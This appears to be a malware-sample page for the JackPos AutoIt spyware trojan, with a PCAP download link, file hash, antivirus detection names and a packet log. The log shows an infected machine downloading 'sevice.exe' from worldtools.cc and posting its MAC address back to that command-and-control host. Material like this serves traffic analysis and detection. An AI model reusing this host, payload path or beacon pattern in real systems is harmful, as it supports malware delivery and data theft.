JackPos Autoit Spyware Trojan Malware service.exe PCAP file download traffic sample

Download Attachments

  • 1 pcap service (Date added: January 16, 2017 5:42 am; Added by: admin; File size: 47 KB; Downloads: 47)
SHA256: ac6d8abf4143abbeba5b973b684141ff8abe947f2a63384d3252c2b8b0700750
File name: sevice.exe
Detection ratio: 43 / 56
Kaspersky Trojan.Win32.Autoit.fgg 20170116
Malwarebytes Spyware.JackPos 20170116
McAfee Artemis!40C9604050E2 20170108
McAfee-GW-Edition BehavesLike.Win32.Generic.tc 20170116
eScan Trojan.GenericKD.4147639 20170116
Microsoft Trojan:Win32/Dynamer!ac 20170116
NANO-Antivirus Trojan.Win32.Autoit.ekgraq 20170116
Panda Trj/CI.A 20170115
Qihoo-360 Win32/Trojan.d80 20170116
Rising Trojan.Injector!8.C4-BSQtmSMkVWS (cloud) 20170116
Sophos Troj/Autoit-BVM 20170116
Symantec Trojan.Gen 20170115
Tencent Win32.Trojan.Autoit.Pciz 20170116
TrendMicro TROJ_OTOTI.GQA 20170116
TrendMicro-HouseCall TROJ_OTOTI.GQA 20170116
VIPRE Trojan.Win32.Generic!BT 20170116
ViRobot Trojan.Win32.S.Autoit.1534464[h]
2017-01-16 00:05:06.003162 IP 192.168.1.102.63152 > 193.109.68.128.80: Flags [P.], seq 0:291, ack 1, win 256, length 291: HTTP: GET /exec/sevice.exe HTTP/1.1
GET /exec/sevice.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: worldtools.cc
Connection: Keep-Alive

2017-01-16 00:05:39.211577 IP 192.168.1.102.61331 > 75.75.75.75.53: 21636+ A? worldtools.cc. (31)
2017-01-16 00:05:39.344430 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [S], seq 1759156153, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-01-16 00:05:39.469489 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 1051522394, win 256, length 0
2017-01-16 00:05:39.470028 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [P.], seq 0:48, ack 1, win 256, length 48: HTTP: GET /post/echo HTTP/1.1
GET /post/echo HTTP/1.1
Host: worldtools.cc

2017-01-16 00:05:39.640279 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [P.], seq 48:238, ack 223, win 255, length 190: HTTP: POST /post HTTP/1.1
POST /post HTTP/1.1
User-Agent: something
Content-Type: application/x-www-form-urlencoded
Host: worldtools.cc
Content-Length: 29
Cache-Control: no-cache

mac=00-0C-29-18-4A-91&t1=&t2=
2017-01-16 00:05:40.392086 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 443, win 254, length 0
2017-01-16 00:05:45.339491 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 444, win 254, length 0